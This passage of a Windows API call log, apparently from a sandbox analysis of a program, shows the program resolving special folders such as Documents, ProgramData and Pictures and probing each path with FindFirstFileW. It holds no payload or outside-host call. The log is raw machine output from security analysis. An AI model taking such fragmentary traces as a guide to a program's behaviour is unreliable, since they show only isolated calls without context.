pbstr=0x28fe2c*="c:\\Users\\kEecfMwgj\\Documents\\") returned 1 [0173.424] SysReAllocStringLen (in: pbstr=0x28fad8*=0x0, psz="c:\\Users\\kEecfMwgj\\Documents\\", len=0x1d | out: pbstr=0x28fad8*="c:\\Users\\kEecfMwgj\\Documents\\") returned 1 [0173.425] SysReAllocStringLen (in: pbstr=0x28fe2c*="c:\\Users\\kEecfMwgj\\Documents\\", psz="c:\\Users\\kEecfMwgj\\Documents", len=0x1c | out: pbstr=0x28fe2c*="c:\\Users\\kEecfMwgj\\Documents") returned 1 [0173.435] SysReAllocStringLen (in: pbstr=0x28fe30*=0x0, psz="c:\\Users\\kEecfMwgj\\Documents", len=0x1c | out: pbstr=0x28fe30*="c:\\Users\\kEecfMwgj\\Documents") returned 1 [0173.435] SysReAllocStringLen (in: pbstr=0x3420050*=0x0, psz="c:\\Users\\kEecfMwgj\\Documents\\", len=0x1d | out: pbstr=0x3420050*="c:\\Users\\kEecfMwgj\\Documents\\") returned 1 [0173.435] SHGetFolderPathW (in: hwnd=0x0, csidl=46, hToken=0x0, dwFlags=0x0, pszPath=0x3423b40 | out: pszPath="C:\\Users\\Public\\Documents") returned 0x0 [0173.436] CharLowerBuffW (in: lpsz="C:\\Users\\Public\\Documents", cchLength=0x19 | out: lpsz="c:\\users\\public\\documents") returned 0x19 [0173.436] SysReAllocStringLen (in: pbstr=0x342009c*=0x0, psz="c:\\users\\public\\documents", len=0x19 | out: pbstr=0x342009c*="c:\\users\\public\\documents") returned 1 [0173.436] SysReAllocStringLen (in: pbstr=0x34200a0*=0x0, psz="c:", len=0x2 | out: pbstr=0x34200a0*="c:") returned 1 [0173.437] SysReAllocStringLen (in: pbstr=0x33e0834*=0x0, psz="users", len=0x5 | out: pbstr=0x33e0834*="users") returned 1 [0173.437] SysReAllocStringLen (in: pbstr=0x34200d4*=0x0, psz="public", len=0x6 | out: pbstr=0x34200d4*="public") returned 1 [0173.438] SysReAllocStringLen (in: pbstr=0x34200e0*=0x0, psz="documents", len=0x9 | out: pbstr=0x34200e0*="documents") returned 1 [0173.438] SysReAllocStringLen (in: pbstr=0x28faf0*=0x0, psz="c:", len=0x2 | out: pbstr=0x28faf0*="c:") returned 1 [0173.438] SysReAllocStringLen (in: pbstr=0x28fe20*=0x0, psz="c:\\", len=0x3 | out: pbstr=0x28fe20*="c:\\") returned 1 [0173.439] SysReAllocStringLen (in: pbstr=0x28fae8*=0x0, psz="users", len=0x5 | out: pbstr=0x28fae8*="users") returned 1 [0173.439] FindFirstFileW (in: lpFileName="c:\\users" (normalized: "c:\\users"), lpFindFileData=0x28fb14 | out: lpFindFileData=0x28fb14*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x791634f0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x791634f0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 0x10ef150 [0173.439] FindNextFileW (in: hFindFile=0x10ef150, lpFindFileData=0x28fb14 | out: lpFindFileData=0x28fb14*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x791634f0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x791634f0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 0 [0173.439] GetLastError () returned 0x12 [0173.439] FindClose (in: hFindFile=0x10ef150 | out: hFindFile=0x10ef150) returned 1 [0173.440] SysReAllocStringLen (in: pbstr=0x28fadc*=0x0, psz="c:\\Users", len=0x8 | out: pbstr=0x28fadc*="c:\\Users") returned 1 [0173.440] SysReAllocStringLen (in: pbstr=0x28fe20*="c:\\Users", psz="c:\\Users\\", len=0x9 | out: pbstr=0x28fe20*="c:\\Users\\") returned 1 [0173.440] SysReAllocStringLen (in: pbstr=0x28fae8*="users", psz="public", len=0x6 | out: pbstr=0x28fae8*="public") returned 1 [0173.440] FindFirstFileW (in: lpFileName="c:\\Users\\public" (normalized: "c:\\users\\public"), lpFindFileData=0x28fb14 | out: lpFindFileData=0x28fb14*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdac04c8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x917fa2ee, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x917fa2ee, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Public", cAlternateFileName="")) returned 0x10ef150 [0173.441] FindNextFileW (in: hFindFile=0x10ef150, lpFindFileData=0x28fb14 | out: lpFindFileData=0x28fb14*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdac04c8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x917fa2ee, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x917fa2ee, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Public", cAlternateFileName="")) returned 0 [0173.441] GetLastError () returned 0x12 [0173.464] FindClose (in: hFindFile=0x10ef150 | out: hFindFile=0x10ef150) returned 1 [0173.465] SysReAllocStringLen (in: pbstr=0x28fadc*="c:\\Users\\", psz="c:\\Users\\Public", len=0xf | out: pbstr=0x28fadc*="c:\\Users\\Public") returned 1 [0173.465] SysReAllocStringLen (in: pbstr=0x28fe20*="c:\\Users\\Public", psz="c:\\Users\\Public\\", len=0x10 | out: pbstr=0x28fe20*="c:\\Users\\Public\\") returned 1 [0173.465] SysReAllocStringLen (in: pbstr=0x28fae8*="public", psz="documents", len=0x9 | out: pbstr=0x28fae8*="documents") returned 1 [0173.465] FindFirstFileW (in: lpFileName="c:\\Users\\Public\\documents" (normalized: "c:\\users\\public\\documents"), lpFindFileData=0x28fb14 | out: lpFindFileData=0x28fb14*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdae6622, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x3079b513, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x3079b513, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Documents", cAlternateFileName="DOCUME~1")) returned 0x10ef150 [0173.466] FindNextFileW (in: hFindFile=0x10ef150, lpFindFileData=0x28fb14 | out: lpFindFileData=0x28fb14*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdae6622, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x3079b513, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x3079b513, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Documents", cAlternateFileName="DOCUME~1")) returned 0 [0173.466] GetLastError () returned 0x12 [0173.466] FindClose (in: hFindFile=0x10ef150 | out: hFindFile=0x10ef150) returned 1 [0173.466] SysReAllocStringLen (in: pbstr=0x28fadc*="c:\\Users\\Public\\", psz="c:\\Users\\Public\\Documents", len=0x19 | out: pbstr=0x28fadc*="c:\\Users\\Public\\Documents") returned 1 [0173.466] SysReAllocStringLen (in: pbstr=0x28fe20*="c:\\Users\\Public\\Documents", psz="c:\\Users\\Public\\Documents\\", len=0x1a | out: pbstr=0x28fe20*="c:\\Users\\Public\\Documents\\") returned 1 [0173.468] SysReAllocStringLen (in: pbstr=0x28fad8*=0x0, psz="c:\\Users\\Public\\Documents\\", len=0x1a | out: pbstr=0x28fad8*="c:\\Users\\Public\\Documents\\") returned 1 [0173.468] SysReAllocStringLen (in: pbstr=0x28fe20*="c:\\Users\\Public\\Documents\\", psz="c:\\Users\\Public\\Documents", len=0x19 | out: pbstr=0x28fe20*="c:\\Users\\Public\\Documents") returned 1 [0173.468] SysReAllocStringLen (in: pbstr=0x28fe24*=0x0, psz="c:\\Users\\Public\\Documents", len=0x19 | out: pbstr=0x28fe24*="c:\\Users\\Public\\Documents") returned 1 [0173.469] SysReAllocStringLen (in: pbstr=0x3420068*=0x0, psz="c:\\Users\\Public\\Documents\\", len=0x1a | out: pbstr=0x3420068*="c:\\Users\\Public\\Documents\\") returned 1 [0173.469] SHGetFolderPathW (in: hwnd=0x0, csidl=38, hToken=0x0, dwFlags=0x0, pszPath=0x3423b40 | out: pszPath="C:\\Program Files (x86)") returned 0x0 [0173.470] CharLowerBuffW (in: lpsz="C:\\Program Files (x86)", cchLength=0x16 | out: lpsz="c:\\program files (x86)") returned 0x16 [0173.470] SysReAllocStringLen (in: pbstr=0x342009c*=0x0, psz="c:\\program files (x86)", len=0x16 | out: pbstr=0x342009c*="c:\\program files (x86)") returned 1 [0173.470] SysReAllocStringLen (in: pbstr=0x34200a0*=0x0, psz="c:", len=0x2 | out: pbstr=0x34200a0*="c:") returned 1 [0173.471] SysReAllocStringLen (in: pbstr=0x33e0834*=0x0, psz="program files (x86)", len=0x13 | out: pbstr=0x33e0834*="program files (x86)") returned 1 [0173.471] SysReAllocStringLen (in: pbstr=0x28faf0*=0x0, psz="c:", len=0x2 | out: pbstr=0x28faf0*="c:") returned 1 [0173.471] SysReAllocStringLen (in: pbstr=0x28fe14*=0x0, psz="c:\\", len=0x3 | out: pbstr=0x28fe14*="c:\\") returned 1 [0173.472] SysReAllocStringLen (in: pbstr=0x28fae8*=0x0, psz="program files (x86)", len=0x13 | out: pbstr=0x28fae8*="program files (x86)") returned 1 [0173.472] FindFirstFileW (in: lpFileName="c:\\program files (x86)" (normalized: "c:\\program files (x86)"), lpFindFileData=0x28fb14 | out: lpFindFileData=0x28fb14*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfd8ab1dc, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x39960750, ftLastAccessTime.dwHighDateTime=0x1d99d01, ftLastWriteTime.dwLowDateTime=0x39960750, ftLastWriteTime.dwHighDateTime=0x1d99d01, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Program Files (x86)", cAlternateFileName="PROGRA~2")) returned 0x10ef150 [0173.482] FindNextFileW (in: hFindFile=0x10ef150, lpFindFileData=0x28fb14 | out: lpFindFileData=0x28fb14*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfd8ab1dc, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x39960750, ftLastAccessTime.dwHighDateTime=0x1d99d01, ftLastWriteTime.dwLowDateTime=0x39960750, ftLastWriteTime.dwHighDateTime=0x1d99d01, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Program Files (x86)", cAlternateFileName="PROGRA~2")) returned 0 [0173.482] GetLastError () returned 0x12 [0173.482] FindClose (in: hFindFile=0x10ef150 | out: hFindFile=0x10ef150) returned 1 [0173.483] SysReAllocStringLen (in: pbstr=0x28fadc*=0x0, psz="c:\\Program Files (x86)", len=0x16 | out: pbstr=0x28fadc*="c:\\Program Files (x86)") returned 1 [0173.483] SysReAllocStringLen (in: pbstr=0x28fe14*="c:\\Program Files (x86)", psz="c:\\Program Files (x86)\\", len=0x17 | out: pbstr=0x28fe14*="c:\\Program Files (x86)\\") returned 1 [0173.484] SysReAllocStringLen (in: pbstr=0x28fad8*=0x0, psz="c:\\Program Files (x86)\\", len=0x17 | out: pbstr=0x28fad8*="c:\\Program Files (x86)\\") returned 1 [0173.484] SysReAllocStringLen (in: pbstr=0x28fe14*="c:\\Program Files (x86)\\", psz="c:\\Program Files (x86)", len=0x16 | out: pbstr=0x28fe14*="c:\\Program Files (x86)") returned 1 [0173.485] SysReAllocStringLen (in: pbstr=0x28fe18*=0x0, psz="c:\\Program Files (x86)", len=0x16 | out: pbstr=0x28fe18*="c:\\Program Files (x86)") returned 1 [0173.485] SysReAllocStringLen (in: pbstr=0x342006c*=0x0, psz="c:\\Program Files (x86)\\", len=0x17 | out: pbstr=0x342006c*="c:\\Program Files (x86)\\") returned 1 [0173.485] SHGetFolderPathW (in: hwnd=0x0, csidl=35, hToken=0x0, dwFlags=0x0, pszPath=0x3423b40 | out: pszPath="C:\\ProgramData") returned 0x0 [0173.486] CharLowerBuffW (in: lpsz="C:\\ProgramData", cchLength=0xe | out: lpsz="c:\\programdata") returned 0xe [0173.486] SysReAllocStringLen (in: pbstr=0x342009c*=0x0, psz="c:\\programdata", len=0xe | out: pbstr=0x342009c*="c:\\programdata") returned 1 [0173.486] SysReAllocStringLen (in: pbstr=0x34200a0*=0x0, psz="c:", len=0x2 | out: pbstr=0x34200a0*="c:") returned 1 [0173.487] SysReAllocStringLen (in: pbstr=0x33e0834*=0x0, psz="programdata", len=0xb | out: pbstr=0x33e0834*="programdata") returned 1 [0173.643] SysReAllocStringLen (in: pbstr=0x28faf0*=0x0, psz="c:", len=0x2 | out: pbstr=0x28faf0*="c:") returned 1 [0173.643] SysReAllocStringLen (in: pbstr=0x28fe08*=0x0, psz="c:\\", len=0x3 | out: pbstr=0x28fe08*="c:\\") returned 1 [0173.643] SysReAllocStringLen (in: pbstr=0x28fae8*=0x0, psz="programdata", len=0xb | out: pbstr=0x28fae8*="programdata") returned 1 [0173.643] FindFirstFileW (in: lpFileName="c:\\programdata" (normalized: "c:\\programdata"), lpFindFileData=0x28fb14 | out: lpFindFileData=0x28fb14*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0xfd943744, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x41b67910, ftLastAccessTime.dwHighDateTime=0x1d99d01, ftLastWriteTime.dwLowDateTime=0x41b67910, ftLastWriteTime.dwHighDateTime=0x1d99d01, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ProgramData", cAlternateFileName="PROGRA~3")) returned 0x10ef150 [0173.643] FindNextFileW (in: hFindFile=0x10ef150, lpFindFileData=0x28fb14 | out: lpFindFileData=0x28fb14*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0xfd943744, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x41b67910, ftLastAccessTime.dwHighDateTime=0x1d99d01, ftLastWriteTime.dwLowDateTime=0x41b67910, ftLastWriteTime.dwHighDateTime=0x1d99d01, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ProgramData", cAlternateFileName="PROGRA~3")) returned 0 [0173.648] GetLastError () returned 0x12 [0173.648] FindClose (in: hFindFile=0x10ef150 | out: hFindFile=0x10ef150) returned 1 [0173.649] SysReAllocStringLen (in: pbstr=0x28fadc*=0x0, psz="c:\\ProgramData", len=0xe | out: pbstr=0x28fadc*="c:\\ProgramData") returned 1 [0173.649] SysReAllocStringLen (in: pbstr=0x28fe08*="c:\\ProgramData", psz="c:\\ProgramData\\", len=0xf | out: pbstr=0x28fe08*="c:\\ProgramData\\") returned 1 [0173.650] SysReAllocStringLen (in: pbstr=0x28fad8*=0x0, psz="c:\\ProgramData\\", len=0xf | out: pbstr=0x28fad8*="c:\\ProgramData\\") returned 1 [0173.650] SysReAllocStringLen (in: pbstr=0x28fe08*="c:\\ProgramData\\", psz="c:\\ProgramData", len=0xe | out: pbstr=0x28fe08*="c:\\ProgramData") returned 1 [0173.650] SysReAllocStringLen (in: pbstr=0x28fe0c*=0x0, psz="c:\\ProgramData", len=0xe | out: pbstr=0x28fe0c*="c:\\ProgramData") returned 1 [0173.650] SysReAllocStringLen (in: pbstr=0x3420070*=0x0, psz="c:\\ProgramData\\", len=0xf | out: pbstr=0x3420070*="c:\\ProgramData\\") returned 1 [0173.651] SHGetFolderPathW (in: hwnd=0x0, csidl=43, hToken=0x0, dwFlags=0x0, pszPath=0x3423b40 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 0x0 [0173.651] SysReAllocStringLen (in: pbstr=0x342009c*=0x0, psz="c:\\program files (x86)\\common files", len=0x23 | out: pbstr=0x342009c*="c:\\program files (x86)\\common files") returned 1 [0173.651] SysReAllocStringLen (in: pbstr=0x34200a0*=0x0, psz="c:", len=0x2 | out: pbstr=0x34200a0*="c:") returned 1 [0173.651] SysReAllocStringLen (in: pbstr=0x33e0834*=0x0, psz="program files (x86)", len=0x13 | out: pbstr=0x33e0834*="program files (x86)") returned 1 [0173.652] SysReAllocStringLen (in: pbstr=0x34200d4*=0x0, psz="common files", len=0xc | out: pbstr=0x34200d4*="common files") returned 1 [0173.652] SysReAllocStringLen (in: pbstr=0x28faf0*=0x0, psz="c:", len=0x2 | out: pbstr=0x28faf0*="c:") returned 1 [0173.652] SysReAllocStringLen (in: pbstr=0x28fdfc*=0x0, psz="c:\\", len=0x3 | out: pbstr=0x28fdfc*="c:\\") returned 1 [0173.652] SysReAllocStringLen (in: pbstr=0x28fae8*=0x0, psz="program files (x86)", len=0x13 | out: pbstr=0x28fae8*="program files (x86)") returned 1 [0173.652] FindFirstFileW (in: lpFileName="c:\\program files (x86)" (normalized: "c:\\program files (x86)"), lpFindFileData=0x28fb14 | out: lpFindFileData=0x28fb14*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfd8ab1dc, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x39960750, ftLastAccessTime.dwHighDateTime=0x1d99d01, ftLastWriteTime.dwLowDateTime=0x39960750, ftLastWriteTime.dwHighDateTime=0x1d99d01, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Program Files (x86)", cAlternateFileName="PROGRA~2")) returned 0x10ef150 [0173.652] FindNextFileW (in: hFindFile=0x10ef150, lpFindFileData=0x28fb14 | out: lpFindFileData=0x28fb14*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfd8ab1dc, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x39960750, ftLastAccessTime.dwHighDateTime=0x1d99d01, ftLastWriteTime.dwLowDateTime=0x39960750, ftLastWriteTime.dwHighDateTime=0x1d99d01, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Program Files (x86)", cAlternateFileName="PROGRA~2")) returned 0 [0173.653] GetLastError () returned 0x12 [0173.653] FindClose (in: hFindFile=0x10ef150 | out: hFindFile=0x10ef150) returned 1 [0173.653] SysReAllocStringLen (in: pbstr=0x28fadc*=0x0, psz="c:\\Program Files (x86)", len=0x16 | out: pbstr=0x28fadc*="c:\\Program Files (x86)") returned 1 [0173.653] SysReAllocStringLen (in: pbstr=0x28fdfc*="c:\\Program Files (x86)", psz="c:\\Program Files (x86)\\", len=0x17 | out: pbstr=0x28fdfc*="c:\\Program Files (x86)\\") returned 1 [0173.653] SysReAllocStringLen (in: pbstr=0x28fae8*="program files (x86)", psz="common files", len=0xc | out: pbstr=0x28fae8*="common files") returned 1 [0173.653] FindFirstFileW (in: lpFileName="c:\\Program Files (x86)\\common files" (normalized: "c:\\program files (x86)\\common files"), lpFindFileData=0x28fb14 | out: lpFindFileData=0x28fb14*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd8ab1dc, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xc80a8680, ftLastAccessTime.dwHighDateTime=0x1da4ad7, ftLastWriteTime.dwLowDateTime=0xc80a8680, ftLastWriteTime.dwHighDateTime=0x1da4ad7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Common Files", cAlternateFileName="COMMON~1")) returned 0x10ef150 [0173.654] FindNextFileW (in: hFindFile=0x10ef150, lpFindFileData=0x28fb14 | out: lpFindFileData=0x28fb14*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd8ab1dc, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xc80a8680, ftLastAccessTime.dwHighDateTime=0x1da4ad7, ftLastWriteTime.dwLowDateTime=0xc80a8680, ftLastWriteTime.dwHighDateTime=0x1da4ad7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Common Files", cAlternateFileName="COMMON~1")) returned 0 [0173.654] GetLastError () returned 0x12 [0173.654] FindClose (in: hFindFile=0x10ef150 | out: hFindFile=0x10ef150) returned 1 [0173.654] SysReAllocStringLen (in: pbstr=0x28fadc*="c:\\Program Files (x86)\\", psz="c:\\Program Files (x86)\\Common Files", len=0x23 | out: pbstr=0x28fadc*="c:\\Program Files (x86)\\Common Files") returned 1 [0173.655] SysReAllocStringLen (in: pbstr=0x28fdfc*="c:\\Program Files (x86)\\Common Files", psz="c:\\Program Files (x86)\\Common Files\\", len=0x24 | out: pbstr=0x28fdfc*="c:\\Program Files (x86)\\Common Files\\") returned 1 [0173.655] SysReAllocStringLen (in: pbstr=0x28fad8*=0x0, psz="c:\\Program Files (x86)\\Common Files\\", len=0x24 | out: pbstr=0x28fad8*="c:\\Program Files (x86)\\Common Files\\") returned 1 [0173.656] SysReAllocStringLen (in: pbstr=0x28fdfc*="c:\\Program Files (x86)\\Common Files\\", psz="c:\\Program Files (x86)\\Common Files", len=0x23 | out: pbstr=0x28fdfc*="c:\\Program Files (x86)\\Common Files") returned 1 [0173.656] SysReAllocStringLen (in: pbstr=0x28fe00*=0x0, psz="c:\\Program Files (x86)\\Common Files", len=0x23 | out: pbstr=0x28fe00*="c:\\Program Files (x86)\\Common Files") returned 1 [0173.656] SysReAllocStringLen (in: pbstr=0x3420074*=0x0, psz="c:\\Program Files (x86)\\Common Files\\", len=0x24 | out: pbstr=0x3420074*="c:\\Program Files (x86)\\Common Files\\") returned 1 [0173.656] SHGetFolderPathW (in: hwnd=0x0, csidl=39, hToken=0x0, dwFlags=0x0, pszPath=0x3423b40 | out: pszPath="C:\\Users\\kEecfMwgj\\Pictures") returned 0x0 [0173.657] CharLowerBuffW (in: lpsz="C:\\Users\\kEecfMwgj\\Pictures", cchLength=0x1b | out: lpsz="c:\\users\\keecfmwgj\\pictures") returned 0x1b [0173.657] SysReAllocStringLen (in: pbstr=0x342009c*=0x0, psz="c:\\users\\keecfmwgj\\pictures", len=0x1b | out: pbstr=0x342009c*="c:\\users\\keecfmwgj\\pictures") returned 1 [0173.658] SysReAllocStringLen (in: pbstr=0x34200a0*=0x0, psz="c:", len=0x2 | out: pbstr=0x34200a0*="c:") returned 1 [0173.658] SysReAllocStringLen (in: pbstr=0x33e0834*=0x0, psz="users", len=0x5 | out: pbstr=0x33e0834*="users") returned 1 [0173.659] SysReAllocStringLen (in: pbstr=0x34200d4*=0x0, psz="keecfmwgj", len=0x9 | out: pbstr=0x34200d4*="keecfmwgj") returned 1 [0173.659] SysReAllocStringLen (in: pbstr=0x34200e0*=0x0, psz="pictures", len=0x8 | out: pbstr=0x34200e0*="pictures") returned 1 [0173.686] SysReAllocStringLen (in: pbstr=0x28faf0*=0x0, psz="c:", len=0x2 | out: pbstr=0x28faf0*="c:") returned 1 [0173.687] SysReAllocStringLen (in: pbstr=0x28fdf0*=0x0, psz="c:\\", len=0x3 | out: pbstr=0x28fdf0*="c:\\") returned 1 [0173.687] SysReAllocStringLen (in: pbstr=0x28fae8*=0x0, psz="users", len=0x5 | out: pbstr=0x28fae8*="users") returned 1 [0173.687] FindFirstFileW (in: lpFileName="c:\\users" (normalized: "c:\\users"), lpFindFileData=0x28fb14 | out: lpFindFileData=0x28fb14*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x791634f0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x791634f0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 0x10ef150 [0173.687] FindNextFileW (in: hFindFile=0x10ef150, lpFindFileData=0x28fb14 | out: lpFindFileData=0x28fb14*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x791634f0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x791634f0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 0 [0173.687] GetLastError () returned 0x12 [0173.687] FindClose (in: hFindFile=0x10ef150 | out: hFindFile=0x10ef150) returned 1 [0173.688] SysReAllocStringLen (in: pbstr=0x28fadc*=0x0, psz="c:\\Users", len=0x8 | out: pbstr=0x28fadc*="c:\\Users") returned 1 [0173.688] SysReAllocStringLen (in: pbstr=0x28fdf0*="c:\\Users", psz="c:\\Users\\", len=0x9 | out: pbstr=0x28fdf0*="c:\\Users\\") returned 1 [0173.688] SysReAllocStringLen (in: pbstr=0x28fae8*="users", psz="keecfmwgj", len=0x9 | out: pbstr=0x28fae8*="keecfmwgj") returned 1 [0173.688] FindFirstFileW (in: lpFileName="c:\\Users\\keecfmwgj" (normalized: "c:\\users\\keecfmwgj"), lpFindFileData=0x28fb14 | out: lpFindFileData=0x28fb14*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x791634f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0xf29f86d0, ftLastAccessTime.dwHighDateTime=0x1d70911, ftLastWriteTime.dwLowDateTime=0xf29f86d0, ftLastWriteTime.dwHighDateTime=0x1d70911, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="kEecfMwgj", cAlternateFileName="KEECFM~1")) returned 0x10ef150 [0173.688] FindNextFileW (in: hFindFile=0x10ef150, lpFindFileData=0x28fb14 | out: lpFindFileData=0x28fb14*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x791634f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0xf29f86d0, ftLastAccessTime.dwHighDateTime=0x1d70911, ftLastWriteTime.dwLowDateTime=0xf29f86d0, ftLastWriteTime.dwHighDateTime=0x1d70911, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="kEecfMwgj", cAlternateFileName="KEECFM~1")) returned 0 [0173.688] GetLastError () returned 0x12 [0173.688] FindClose (in: hFindFile=0x10ef150 | out: hFindFile=0x10ef150) returned 1 [0173.689] SysReAllocStringLen (in: pbstr=0x28fadc*="c:\\Users\\", psz="c:\\Users\\kEecfMwgj", len=0x12 | out: pbstr=0x28fadc*="c:\\Users\\kEecfMwgj") returned 1 [0173.689] SysReAllocStringLen (in: pbstr=0x28fdf0*="c:\\Users\\kEecfMwgj", psz="c:\\Users\\kEecfMwgj\\", len=0x13 | out: pbstr=0x28fdf0*="c:\\Users\\kEecfMwgj\\") returned 1 [0173.689] SysReAllocStringLen (in: pbstr=0x28fae8*="keecfmwgj", psz="pictures", len=0x8 | out: pbstr=0x28fae8*="pictures") returned 1 [0173.689] FindFirstFileW (in: lpFileName="c:\\Users\\kEecfMwgj\\pictures" (normalized: "c:\\users\\keecfmwgj\\pictures"), lpFindFileData=0x28fb14 | out: lpFindFileData=0x28fb14*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x794a9330, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0xc74c1880, ftLastAccessTime.dwHighDateTime=0x1da4ad7, ftLastWriteTime.dwLowDateTime=0xc74c1880, ftLastWriteTime.dwHighDateTime=0x1da4ad7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Pictures", cAlternateFileName="")) returned 0x10ef150 [0173.689] FindNextFileW (in: hFindFile=0x10ef150, lpFindFileData=0x28fb14 | out: lpFindFileData=0x28fb14*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x794a9330, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0xc74c1880, ftLastAccessTime.dwHighDateTime=0x1da4ad7, ftLastWriteTime.dwLowDateTime=0xc74c1880, ftLastWriteTime.dwHighDateTime=0x1da4ad7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Pictures", cAlternateFileName="")) returned 0 [0173.690] GetLastError () returned 0x12 [0173.690] FindClose (in: hFindFile=0x10ef150 | out: hFindFile=0x10ef150) returned 1 [0173.690] SysReAllocStringLen (in: pbstr=0x28fadc*="c:\\Users\\kEecfMwgj\\", 